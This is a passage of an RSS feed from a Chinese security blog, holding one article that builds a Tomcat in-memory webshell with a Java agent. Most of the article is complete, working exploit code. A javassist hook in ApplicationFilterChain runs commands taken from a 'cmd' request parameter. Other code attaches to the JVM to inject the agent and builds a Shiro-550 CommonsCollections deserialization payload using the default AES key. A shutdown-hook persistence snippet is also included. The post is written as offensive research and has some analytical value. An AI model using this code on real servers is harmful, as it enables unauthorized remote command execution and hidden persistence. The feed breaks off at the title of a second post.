<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>java &#8211; ChaBug安全</title>
	<atom:link href="/tags/java/feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description>一个分享知识、结识伙伴、资源共享的博客</description>
	<lastBuildDate>Thu, 01 Oct 2020 14:43:33 +0000</lastBuildDate>
	<language>zh-CN</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=5.5.5</generator>
	<item>
		<title>Java Agent实现反序列化注入内存shell</title>
		<link>/audit/1920.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 01 Oct 2020 14:43:33 +0000</pubDate>
				<category><![CDATA[代码审计]]></category>
		<category><![CDATA[agent]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[内存shell]]></category>
		<category><![CDATA[反序列化]]></category>
		<guid isPermaLink="false">/?p=1920</guid>

					<description><![CDATA[简述内存shell Java内存shell有很多种，大致分为： 动态注册servlet 动态注册filter 动态注册listener 基于Java agent拦截修改关键类字节码...]]></description>
										<content:encoded><![CDATA[<h1>简述<span class="wpcom_tag_link"><a href="/tags/%e5%86%85%e5%ad%98shell" title="内存shell" target="_blank">内存shell</a></span></h1>
<p>Java内存<span class="wpcom_tag_link"><a href="/tags/shell" title="shell" target="_blank">shell</a></span>有很多种，大致分为：</p>
<ol>
<li>动态注册servlet</li>
<li>动态注册filter</li>
<li>动态注册listener</li>
<li>基于Java <span class="wpcom_tag_link"><a href="/tags/agent" title="agent" target="_blank">agent</a></span>拦截修改关键类字节码实现内存shell</li>
</ol>
<p>前三种方法在 <a class="wp-editor-md-post-content-link" href="https://mp.weixin.qq.com/s/YhiOHWnqXVqvLNH7XSxC9w">《JSP Webshell那些事 &#8212; 攻击篇(下)》</a> 一文中均有讲解，但是前三种方法均需要对中间件大量调试，反射调用一步一步的链条，对于大型中间件比如weblogic这种比较麻烦，无法实现一套代码通用。</p>
<p>那么本文将要讲解的最后一种方法，通过拦截修改关键类的字节码，只需要寻找到关键类做处理即可，进而最大程度实现一套代码通用（理论上）。</p>
<h1>简单认识Java Agent</h1>
<p>在jdk的rt.jar包中存在一个<code><span class="wpcom_tag_link"><a href="/tags/java" title="java" target="_blank">java</a></span>.lang.instrument</code>包，该包提供了一些工具帮助开发人员在 Java 程序运行时，动态修改系统中的 Class 类型。其中，使用该软件包的一个关键组件就是 Javaagent。从名字上看，似乎是个 Java 代理之类的，而实际上，他的功能更像是一个Class 类型的转换器，他可以在运行时接受重新外部请求，对Class类型进行修改。</p>
<p>Javaagent是java命令的一个参数。参数 javaagent 可以用于指定一个 jar 包，并且对该 java 包有2个要求：<br />
1. 这个 jar 包的 <code>MANIFEST.MF</code> 文件必须指定 <code>Premain-Class</code> 项。<br />
2. <code>Premain-Class</code> 指定的那个类必须实现 premain() 方法。</p>
<p>JVM启动时会优先加载agent里面的东西，我们写一个简单的agent来看一下。</p>
<p>项目结构</p>
<pre><code class="language-bash line-numbers">└───src
    └───org
        └───chabug
                Agent.java
                DefineTransformer.java
</code></pre>
<p>org.chabug.Agent.java</p>
<pre><code class="language-java line-numbers">package org.chabug;

import java.lang.instrument.Instrumentation;

public class Agent {
    public static void premain(String agentArgs, Instrumentation inst) {
        System.out.println("agentArgs : " + agentArgs);
        inst.addTransformer(new DefineTransformer(), true);
    }
}
</code></pre>
<p>org.chabug.DefineTransformer.java</p>
<pre><code class="language-java line-numbers">package org.chabug;

import java.lang.instrument.ClassFileTransformer;
import java.lang.instrument.IllegalClassFormatException;
import java.security.ProtectionDomain;

public class DefineTransformer implements ClassFileTransformer {
    @Override
    public byte[] transform(ClassLoader loader, String className, Class&lt;?&gt; classBeingRedefined, ProtectionDomain protectionDomain, byte[] classfileBuffer) throws IllegalClassFormatException {
        System.out.println("premain load Class:" + className);
        return new byte[0];
    }
}
</code></pre>
<p>然后配置打包文件<code>srcMETA-INFMANIFEST.MF</code></p>
<pre><code class="language-yaml line-numbers">Manifest-Version: 1.0
Can-Redefine-Classes: true
Can-Retransform-Classes: true
Premain-Class: org.chabug.Agent

</code></pre>
<p>idea打包为jar文件之后，创建一个新的类<code>org.chabug.Main</code>测试agent</p>
<pre><code class="language-java line-numbers">package org.chabug;

public class Main {
    public static void main(String[] args) {
        System.out.println("thisismain");
    }
}
</code></pre>
<p>idea设置运行时vm参数<code>-javaagent:outartifactsTestAgent_jarTestAgent.jar</code><br />
<img src="https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/593424/aabc9058-b9af-8553-d97b-974d8bcc5a82.png" alt="image.png" /></p>
<p>运行结果</p>
<pre><code class="language-text line-numbers">agentArgs : null
premain load Class:java/util/concurrent/ConcurrentHashMap$ForwardingNode
premain load Class:sun/misc/URLClassPath$JarLoader$2
premain load Class:java/util/jar/Attributes
premain load Class:java/util/jar/Manifest$FastInputStream
premain load Class:java/lang/StringCoding
premain load Class:java/lang/StringCoding$StringDecoder
premain load Class:java/util/jar/Attributes$Name
premain load Class:sun/misc/ASCIICaseInsensitiveComparator
premain load Class:com/intellij/rt/execution/application/AppMainV2$Agent
premain load Class:com/intellij/rt/execution/application/AppMainV2
premain load Class:com/intellij/rt/execution/application/AppMainV2$1
premain load Class:java/lang/reflect/InvocationTargetException
premain load Class:java/lang/NoSuchMethodException
premain load Class:java/net/Socket
premain load Class:java/net/InetSocketAddress
premain load Class:java/net/SocketAddress
premain load Class:java/net/InetAddress
premain load Class:java/net/InetSocketAddress$InetSocketAddressHolder
premain load Class:sun/security/action/GetBooleanAction
premain load Class:java/lang/invoke/MethodHandleImpl
premain load Class:java/net/InetAddress$1
premain load Class:java/lang/invoke/MethodHandleImpl$1
premain load Class:java/lang/invoke/MethodHandleImpl$2
premain load Class:java/util/function/Function
premain load Class:java/net/InetAddress$InetAddressHolder
premain load Class:java/net/InetAddress$Cache
premain load Class:java/net/InetAddress$Cache$Type
premain load Class:java/net/InetAddressImplFactory
premain load Class:java/lang/invoke/MethodHandleImpl$3
premain load Class:java/lang/invoke/MethodHandleImpl$4
premain load Class:java/lang/ClassValue
premain load Class:java/net/Inet6AddressImpl
premain load Class:java/lang/ClassValue$Entry
premain load Class:java/net/InetAddressImpl
premain load Class:java/lang/ClassValue$Identity
premain load Class:java/lang/ClassValue$Version
premain load Class:java/lang/invoke/MemberName$Factory
premain load Class:java/net/InetAddress$2
premain load Class:java/lang/invoke/MethodHandleStatics
premain load Class:sun/net/spi/nameservice/NameService
premain load Class:java/lang/invoke/MethodHandleStatics$1
premain load Class:java/net/Inet4Address
premain load Class:java/net/SocksSocketImpl
premain load Class:java/net/SocksConsts
premain load Class:sun/misc/PostVMInitHook
premain load Class:java/net/PlainSocketImpl
premain load Class:sun/misc/PostVMInitHook$2
premain load Class:java/net/AbstractPlainSocketImpl
premain load Class:jdk/internal/util/EnvUtils
premain load Class:sun/misc/PostVMInitHook$1
premain load Class:java/net/SocketImpl
premain load Class:java/net/SocketOptions
premain load Class:sun/usagetracker/UsageTrackerClient
premain load Class:java/net/AbstractPlainSocketImpl$1
premain load Class:java/util/concurrent/atomic/AtomicBoolean
premain load Class:sun/usagetracker/UsageTrackerClient$1
premain load Class:java/net/PlainSocketImpl$1
premain load Class:sun/usagetracker/UsageTrackerClient$4
premain load Class:sun/misc/FloatingDecimal
premain load Class:sun/usagetracker/UsageTrackerClient$2
premain load Class:sun/misc/FloatingDecimal$ExceptionalBinaryToASCIIBuffer
premain load Class:sun/misc/FloatingDecimal$BinaryToASCIIConverter
premain load Class:sun/usagetracker/UsageTrackerClient$3
premain load Class:sun/misc/FloatingDecimal$BinaryToASCIIBuffer
premain load Class:sun/misc/FloatingDecimal$1
premain load Class:sun/misc/FloatingDecimal$PreparedASCIIToBinaryBuffer
premain load Class:sun/misc/FloatingDecimal$ASCIIToBinaryConverter
premain load Class:sun/misc/FloatingDecimal$ASCIIToBinaryBuffer
premain load Class:java/net/DualStackPlainSocketImpl
premain load Class:java/lang/StringCoding$StringEncoder
premain load Class:java/net/Inet6Address
premain load Class:java/io/FileOutputStream$1
premain load Class:java/net/Inet6Address$Inet6AddressHolder
premain load Class:sun/launcher/LauncherHelper
premain load Class:java/net/SocksSocketImpl$3
premain load Class:sun/nio/cs/MS1252
premain load Class:java/net/ProxySelector
premain load Class:sun/nio/cs/SingleByte
premain load Class:sun/net/spi/DefaultProxySelector
premain load Class:sun/nio/cs/SingleByte$Decoder
premain load Class:sun/net/spi/DefaultProxySelector$1
premain load Class:sun/net/NetProperties
premain load Class:sun/net/NetProperties$1
premain load Class:org/chabug/Main
premain load Class:sun/launcher/LauncherHelper$FXHelper
premain load Class:java/util/Properties$LineReader
premain load Class:java/lang/Class$MethodArray
premain load Class:java/lang/Void
thisismain
premain load Class:java/lang/Shutdown
premain load Class:java/net/URI
premain load Class:java/lang/Shutdown$Lock
</code></pre>
<p>可以看到agent的<code>org.chabug.Agent#premain</code>优于Main方法而先被运行，并且在<code>org.chabug.DefineTransformer#transform</code>获取到了JVM加载的类。</p>
<p>那么思路回到内存shell的思路中，如果我们把这个agent加载到jvm中，那么就可以通过javassist进行字节码插桩，修改tomcat的filter实现类，从而实现内存马。</p>
<p>现在的问题就在于：</p>
<ol>
<li>javassist 应该修改哪个关键类？</li>
<li>如何指定运行时tomcat的<code>-javaagent</code>参数？</li>
<li>如何修改tomcat运行后已经加载的类？</li>
<li>如何通过<span class="wpcom_tag_link"><a href="/tags/%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96" title="反序列化" target="_blank">反序列化</a></span>注入</li>
</ol>
<h1>寻找关键类</h1>
<p>tomcat filter内存shell有无数的分析文章，其中大部分都提到了一个关键类<code>org.apache.catalina.core.ApplicationFilterChain#doFilter</code><br />
<img src="/wp-content/uploads/2020/10/02f7b000-46b4-ebb6-208c-fbc57bd4fab2.png" alt="image.png" /></p>
<p>该方法有ServletRequest和ServletResponse两个参数，里面封装了请求的request和response。另外，internalDoFilter方法是自定义filter的入口，如果在这里拦截，那么filter既通用，又不影响正常业务。</p>
<p>来写agent</p>
<pre><code class="language-java line-numbers">package org.chabug;

import java.lang.instrument.Instrumentation;

public class MyAgent {
    // tomcat FilterChain
    public static String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    public static void agentmain(String args, Instrumentation inst) throws Exception {
        inst.addTransformer(new MyTransformer(), true);
        Class[] loadedClasses = inst.getAllLoadedClasses();

        for (int i = 0; i &lt; loadedClasses.length; ++i) {
            Class clazz = loadedClasses[i];
            if (clazz.getName().equals(ClassName)) {
                try {
                    inst.retransformClasses(new Class[]{clazz});
                } catch (Exception var9) {
                    var9.printStackTrace();
                }
            }
        }
//        System.out.println("agent done");
    }

    public static void premain(String args, Instrumentation inst) throws Exception {

    }
}
</code></pre>
<p>定义transform</p>
<pre><code class="language-java line-numbers">package org.chabug;

import javassist.*;

import java.io.IOException;
import java.lang.instrument.ClassFileTransformer;
import java.security.ProtectionDomain;

public class MyTransformer implements ClassFileTransformer {
    public static String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    @Override
    public byte[] transform(ClassLoader loader, String className, Class&lt;?&gt; aClass, ProtectionDomain protectionDomain, byte[] classfileBuffer) {
        className = className.replace('/', '.');

        if (className.equals(ClassName)) {
//            System.out.println(":::::::::::::::::::find shiro ApplicationFilterChain:" + className);
            ClassPool cp = ClassPool.getDefault();
            if (aClass != null) {
                ClassClassPath classPath = new ClassClassPath(aClass);
                cp.insertClassPath(classPath);
            }
            CtClass cc;
            try {
                cc = cp.get(className);
                CtMethod m = cc.getDeclaredMethod("doFilter");
                m.insertBefore(" javax.servlet.ServletRequest req = request;n" +
                        "            javax.servlet.ServletResponse res = response;" +
                        "String cmd = req.getParameter("cmd");n" +
                        "if (cmd != null) {n" +
                        "Process process = Runtime.getRuntime().exec(cmd);n" +
                        "java.io.BufferedReader bufferedReader = new java.io.BufferedReader(n" +
                        "new java.io.InputStreamReader(process.getInputStream()));n" +
                        "StringBuilder stringBuilder = new StringBuilder();n" +
                        "String line;n" +
                        "while ((line = bufferedReader.readLine()) != null) {n" +
                        "stringBuilder.append(line + '\n');n" +
                        "}n" +
                        "res.getOutputStream().write(stringBuilder.toString().getBytes());n" +
                        "res.getOutputStream().flush();n" +
                        "res.getOutputStream().close();n" +
                        "}");
                byte[] byteCode = cc.toBytecode();
                cc.detach();
                return byteCode;
            } catch (NotFoundException | IOException | CannotCompileException e) {
                e.printStackTrace();
//                System.out.println("error:::::::::::::::::::::" + e.getMessage());
            }
        }

        return new byte[0];
    }
}
</code></pre>
<h1>如何指定<code>-javaagent</code>参数</h1>
<p>tomcat运行前我们无法控制命令行参数，但是运行时JVM提供了<code>com.sun.tools.attach.VirtualMachine</code>的api，可以通过这个类attach jvm，然后通过<code>loadAgent()</code>函数把agent加载进去。</p>
<p>然后在这里又碰到了坑，<code>com.sun.tools.attach.VirtualMachine</code>这个类是JDK的<code>C:Program FilesJavajdk1.8.0_251libtools.jar</code>包中，在tomcat运行时是jre环境，获取不到这个类。我的办法是通过URLClassLoader加载<code>java.home</code>拼接出来的jar包路径，然后反射获取类和方法。</p>
<p>实现代码</p>
<pre><code class="language-java line-numbers">package org.chabug;

public class Main {
    public static void main(String[] args) throws Exception {
        if (args.length == 0) {
            return;
        }
        String agentPath = args[0];
        try {
            java.io.File toolsJar = new java.io.File(System.getProperty("java.home").replaceFirst("jre", "lib") + java.io.File.separator + "tools.jar");
            java.net.URLClassLoader classLoader = (java.net.URLClassLoader) java.lang.ClassLoader.getSystemClassLoader();
            java.lang.reflect.Method add = java.net.URLClassLoader.class.getDeclaredMethod("addURL", new java.lang.Class[]{java.net.URL.class});
            add.setAccessible(true);
            add.invoke(classLoader, new Object[]{toolsJar.toURI().toURL()});
            Class&lt;?&gt; MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");
            Class&lt;?&gt; MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");
            java.lang.reflect.Method list = MyVirtualMachine.getDeclaredMethod("list", new java.lang.Class[]{});
            java.util.List&lt;Object&gt; invoke = (java.util.List&lt;Object&gt;) list.invoke(null, new Object[]{});
//            System.out.println(invoke);

            for (int i = 0; i &lt; invoke.size(); i++) {
                Object o = invoke.get(i);
                java.lang.reflect.Method displayName = o.getClass().getSuperclass().getDeclaredMethod("displayName", new Class[]{});
                Object name = displayName.invoke(o, new Object[]{});
                System.out.println(String.format("find jvm process name:[[[" +
                        "%s" +
                        "]]]", name.toString()));
                if (name.toString().contains("org.apache.catalina.startup.Bootstrap")) {
                    java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach", new Class[]{MyVirtualMachineDescriptor});
                    Object machine = attach.invoke(MyVirtualMachine, new Object[]{o});
                    java.lang.reflect.Method loadAgent = machine.getClass().getSuperclass().getSuperclass().getDeclaredMethod("loadAgent", new Class[]{String.class});
                    loadAgent.invoke(machine, new Object[]{agentPath});
                    java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach", new Class[]{});
                    detach.invoke(machine, new Object[]{});
                    System.out.println("inject tomcat done, break.");
                    System.out.println("check url http://localhost:8080/?cmd=whoami");
                    break;
                }
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p>运行这个类，传入agentPath就可以注入agent了。</p>
<p>在这里还碰到一个坑:<code>VirtualMachine.list()</code>获取为空，后来发现双击tomcat的startup.bat启动，在jconsole中也找不到jvm进程，然后一顿乱试发现通过命令行运行startup.bat就可以了。</p>
<h1>如何修改tomcat运行后已经加载的类</h1>
<p>其实这个问题在上面写agent的时候已经解决了，关键代码</p>
<pre><code class="language-java line-numbers">Class[] loadedClasses = inst.getAllLoadedClasses();

for (int i = 0; i &lt; loadedClasses.length; ++i) {
    Class clazz = loadedClasses[i];
    if (clazz.getName().equals(ClassName)) {
        try {
            inst.retransformClasses(new Class[]{clazz});
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
</code></pre>
<p>通过<code>Instrumentation</code>的<code>getAllLoadedClasses()</code>就能拿到tomcat运行后已经加载的类，再通过<code>retransformClasses()</code>重新转换下就可以了。</p>
<h1>如何通过反序列化注入</h1>
<p>我这里是shiro550 tomcat9的环境，根据 https://github.com/feihong-cs/ShiroExploit 的ysoserial工具抠出来CC10的链条，改了改。</p>
<pre><code class="language-java line-numbers">package org.chabug.demo;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.org.apache.xerces.internal.impl.dv.util.Base64;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.util.Reflections;

import javax.crypto.BadPaddingException;
import javax.crypto.Cipher;
import javax.crypto.IllegalBlockSizeException;
import javax.crypto.NoSuchPaddingException;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;
import java.io.*;
import java.lang.reflect.Field;
import java.security.InvalidKeyException;
import java.security.NoSuchAlgorithmException;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;

// 依赖 commons-collections:commons-collections:3.2.1
// 依赖于 ysoserial javassist
public class CC10 {

    static {
        System.setProperty("jdk.xml.enableTemplatesImplDeserialization", "true");
        System.setProperty("java.rmi.server.useCodebaseOnly", "false");
    }

    public static Object createTemplatesImpl(String command) throws Exception {
        return Boolean.parseBoolean(System.getProperty("properXalan", "false")) ? createTemplatesImpl(command, Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")) : createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class);
    }

    public static &lt;T&gt; T createTemplatesImpl(String agentPath, Class&lt;T&gt; tplClass, Class&lt;?&gt; abstTranslet, Class&lt;?&gt; transFactory) throws Exception {
        T templates = tplClass.newInstance();
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(StubTransletPayload.class));
        pool.insertClassPath(new ClassClassPath(abstTranslet));
        CtClass clazz = pool.get(StubTransletPayload.class.getName());
        String cmd = String.format(
                "        try {n" +
                        "java.io.File toolsJar = new java.io.File(System.getProperty("java.home").replaceFirst("jre", "lib") + java.io.File.separator + "tools.jar");n" +
                        "java.net.URLClassLoader classLoader = (java.net.URLClassLoader) java.lang.ClassLoader.getSystemClassLoader();n" +
                        "java.lang.reflect.Method add = java.net.URLClassLoader.class.getDeclaredMethod("addURL", new java.lang.Class[]{java.net.URL.class});n" +
                        "add.setAccessible(true);n" +
                        "            add.invoke(classLoader, new Object[]{toolsJar.toURI().toURL()});n" +
                        "Class/*&lt;?&gt;*/ MyVirtualMachine = classLoader.loadClass("com.sun.tools.attach.VirtualMachine");n" +
                        "            Class/*&lt;?&gt;*/ MyVirtualMachineDescriptor = classLoader.loadClass("com.sun.tools.attach.VirtualMachineDescriptor");" +
                        "java.lang.reflect.Method list = MyVirtualMachine.getDeclaredMethod("list", null);n" +
                        "            java.util.List/*&lt;Object&gt;*/ invoke = (java.util.List/*&lt;Object&gt;*/) list.invoke(null, null);" +
                        "for (int i = 0; i &lt; invoke.size(); i++) {" +
                        "Object o = invoke.get(i);n" +
                        "                java.lang.reflect.Method displayName = o.getClass().getSuperclass().getDeclaredMethod("displayName", null);n" +
                        "                Object name = displayName.invoke(o, null);n" +
                        "if (name.toString().contains("org.apache.catalina.startup.Bootstrap")) {" +
                        "                    java.lang.reflect.Method attach = MyVirtualMachine.getDeclaredMethod("attach", new Class[]{MyVirtualMachineDescriptor});n" +
                        "                    Object machine = attach.invoke(MyVirtualMachine, new Object[]{o});n" +
                        "                    java.lang.reflect.Method loadAgent = machine.getClass().getSuperclass().getSuperclass().getDeclaredMethod("loadAgent", new Class[]{String.class});n" +
                        "                    loadAgent.invoke(machine, new Object[]{"%s"});n" +
                        "                    java.lang.reflect.Method detach = MyVirtualMachine.getDeclaredMethod("detach", null);n" +
                        "                    detach.invoke(machine, null);n" +
                        "                    break;n" +
                        "}" +
                        "}" +
                        "} catch (Exception e) {n" +
                        "            e.printStackTrace();n" +
                        "        }"
                , agentPath.replaceAll("\\", "\\\\").replaceAll(""", "\""));

        clazz.makeClassInitializer().insertAfter(cmd);
        clazz.setName("ysoserial.Pwner" + System.nanoTime());
        CtClass superC = pool.get(abstTranslet.getName());
        clazz.setSuperclass(superC);
        byte[] classBytes = clazz.toBytecode();
        Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{classBytes, classAsBytes(Foo.class)});
        Reflections.setFieldValue(templates, "_name", "Pwnr");
        Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
        return templates;
    }

    public static String classAsFile(Class&lt;?&gt; clazz) {
        return classAsFile(clazz, true);
    }

    public static String classAsFile(Class&lt;?&gt; clazz, boolean suffix) {
        String str;
        if (clazz.getEnclosingClass() == null) {
            str = clazz.getName().replace(".", "/");
        } else {
            str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName();
        }

        if (suffix) {
            str = str + ".class";
        }

        return str;
    }

    public static byte[] classAsBytes(Class&lt;?&gt; clazz) {
        try {
            byte[] buffer = new byte[1024];
            String file = classAsFile(clazz);
            InputStream in = CC10.class.getClassLoader().getResourceAsStream(file);
            if (in == null) {
                throw new IOException("couldn't find '" + file + "'");
            } else {
                ByteArrayOutputStream out = new ByteArrayOutputStream();

                int len;
                while ((len = in.read(buffer)) != -1) {
                    out.write(buffer, 0, len);
                }

                return out.toByteArray();
            }
        } catch (IOException var6) {
            throw new RuntimeException(var6);
        }
    }


    public static void main(String[] args) throws Exception {
        // this is your agent path
        String command = "E:\code\java\MyAgent\out\artifacts\MyAgent_jar\MyAgent.jar";
        Object templates = createTemplatesImpl(command);
        InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);
        Map innerMap = new HashMap();
        Map lazyMap = LazyMap.decorate(innerMap, transformer);
        TiedMapEntry entry = new TiedMapEntry(lazyMap, templates);
        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;

        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException var17) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        Reflections.setAccessible(f);
        HashMap innimpl = null;
        innimpl = (HashMap) f.get(map);
        Field f2 = null;

        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException var16) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        Reflections.setAccessible(f2);
        Object[] array = new Object[0];
        array = (Object[]) ((Object[]) f2.get(innimpl));
        Object node = array[0];
        if (node == null) {
            node = array[1];
        }

        Field keyField = null;

        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (Exception var15) {
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        Reflections.setAccessible(keyField);
        keyField.set(node, entry);
        Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

        byte[] bytes = Serializables.serializeToBytes(map);
        String key = "kPH+bIxk5D2deZiIxcaaaA==";
        String rememberMe = EncryptUtil.shiroEncrypt(key, bytes);
        System.out.println(rememberMe);
    }

    public static class Foo implements Serializable {
        private static final long serialVersionUID = 8207363842866235160L;

        public Foo() {
        }
    }

    public static class StubTransletPayload extends AbstractTranslet implements Serializable {
        private static final long serialVersionUID = -5971610431559700674L;

        public StubTransletPayload() {
        }

        public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
        }

        public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
        }
    }


}

class Serializables {
    public static byte[] serializeToBytes(final Object obj) throws Exception {
        final ByteArrayOutputStream out = new ByteArrayOutputStream();
        final ObjectOutputStream objOut = new ObjectOutputStream(out);
        objOut.writeObject(obj);
        objOut.flush();
        objOut.close();
        return out.toByteArray();
    }


    public static Object deserializeFromBytes(final byte[] serialized) throws Exception {
        final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
        final ObjectInputStream objIn = new ObjectInputStream(in);
        return objIn.readObject();
    }

    public static void serializeToFile(String path, Object obj) throws Exception {
        FileOutputStream fos = new FileOutputStream("object");
        ObjectOutputStream os = new ObjectOutputStream(fos);
        //writeObject()方法将obj对象写入object文件
        os.writeObject(obj);
        os.close();
    }

    public static Object serializeFromFile(String path) throws Exception {
        FileInputStream fis = new FileInputStream(path);
        ObjectInputStream ois = new ObjectInputStream(fis);
        // 通过Object的readObject()恢复对象
        Object obj = ois.readObject();
        ois.close();
        return obj;
    }

}


class EncryptUtil {
    private static final String ENCRY_ALGORITHM = "AES";
    private static final String CIPHER_MODE = "AES/CBC/PKCS5Padding";
    private static final byte[] IV = "aaaaaaaaaaaaaaaa".getBytes();     // 16字节IV

    public EncryptUtil() {
    }

    public static byte[] encrypt(byte[] clearTextBytes, byte[] pwdBytes) {
        try {
            SecretKeySpec keySpec = new SecretKeySpec(pwdBytes, ENCRY_ALGORITHM);
            Cipher cipher = Cipher.getInstance(CIPHER_MODE);
            IvParameterSpec iv = new IvParameterSpec(IV);
            cipher.init(1, keySpec, iv);
            byte[] cipherTextBytes = cipher.doFinal(clearTextBytes);
            return cipherTextBytes;
        } catch (NoSuchPaddingException var6) {
            var6.printStackTrace();
        } catch (NoSuchAlgorithmException var7) {
            var7.printStackTrace();
        } catch (BadPaddingException var8) {
            var8.printStackTrace();
        } catch (IllegalBlockSizeException var9) {
            var9.printStackTrace();
        } catch (InvalidKeyException var10) {
            var10.printStackTrace();
        } catch (Exception var11) {
            var11.printStackTrace();
        }

        return null;
    }

    public static String shiroEncrypt(String key, byte[] objectBytes) {
        byte[] pwd = Base64.decode(key);
        byte[] cipher = encrypt(objectBytes, pwd);

        assert cipher != null;

        byte[] output = new byte[pwd.length + cipher.length];
        byte[] iv = IV;
        System.arraycopy(iv, 0, output, 0, iv.length);
        System.arraycopy(cipher, 0, output, pwd.length, cipher.length);
        return Base64.encode(output);
    }
}
</code></pre>
<p>在javassist插桩的时候碰到很多坑，比如泛型要用<code>/**/</code>包起来，反射的可变参数的处理等等，不一一细讲，参考我的代码就行了。</p>
<h1>效果</h1>
<p><img src="/wp-content/uploads/2020/10/21f519ec-a731-13c4-eb06-60d03b75fc67.gif" alt="shell.gif" /></p>
<p>项目地址：https://github.com/Y4er/javaagent-tomcat-memshell</p>
<h1>思考</h1>
<p>写到这里又看了一些文章，发现了一些问题。</p>
<h2>内存shell复活</h2>
<p>@rebeyond 师傅的memShell项目实现了内存shell复活，原理是通过设置Java虚拟机的关闭钩子ShutdownHook来达到这个目的，但是会有一个jar包循环等待jvm进程起来，更敏感，我就没实现这个东西，代码贴出来</p>
<pre><code class="language-java line-numbers">public static void persist() {
     try {
         Thread t = new Thread() {
             public void run() {
                 try {
                     writeFiles("inject.jar",Agent.injectFileBytes);
                     writeFiles("agent.jar",Agent.agentFileBytes);
                     startInject();
                 } catch (Exception e) {

                 }
             }
         };
         t.setName("shutdown Thread");
         Runtime.getRuntime().addShutdownHook(t);
     } catch (Throwable t) {
     }
}
</code></pre>
<p>JVM关闭前，会先调用writeFiles把inject.jar和agent.jar写到磁盘上，然后调用startInject，startInject通过Runtime.exec启动<code>java -jar inject.jar</code>。</p>
<h2>文件落地并且被锁定</h2>
<p>用javaagent的形式实现的内存shell，你需要落地一个agent进去，加载agent之后jar不能被删除，而落地agent会不会更敏感？</p>
<p>与其落地文件为什么不直接落地jsp shell，获取对于mvc和springboot这种有点作用，但是内存shell的意义确实被削弱了。</p>
<h2>通用性</h2>
<p>只需要寻找关键类即可，对于tomcat、weblogic这种还算通用，完全可以实现一个agent.jar通杀。</p>
<h2>关键类寻找</h2>
<p>如果关键类找不对，或者错了几个参数的命名，那么中间件正常处理filter的逻辑很可能发生错误，中间件很可能被打挂。虽然可以本地环境调试，但是每个发行版不同、补丁数的不同所带来的不稳定因素还是很大的。</p>
<h2>结论</h2>
<p>所以个人而言，agent类型的内存shell只能作为内存shell的一种开拓性思路，实际环境更应该倾向于servlet、filter这种内存shell，重在稳定。</p>
<h1>参考</h1>
<ol>
<li>https://www.cnblogs.com/rebeyond/p/9686213.html</li>
<li>https://github.com/rebeyond/memShell</li>
<li>https://www.cnblogs.com/rickiyang/p/11368932.html</li>
<li>https://github.com/Y4er/javaagent-tomcat-memshell</li>
</ol>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Spring Cloud SnakeYAML 一键注册内存cmd shell和reGeorg</title>
		<link>/web/1913.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Thu, 24 Sep 2020 11:30:03 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[java]]></category>
		<category><![CDATA[rce]]></category>
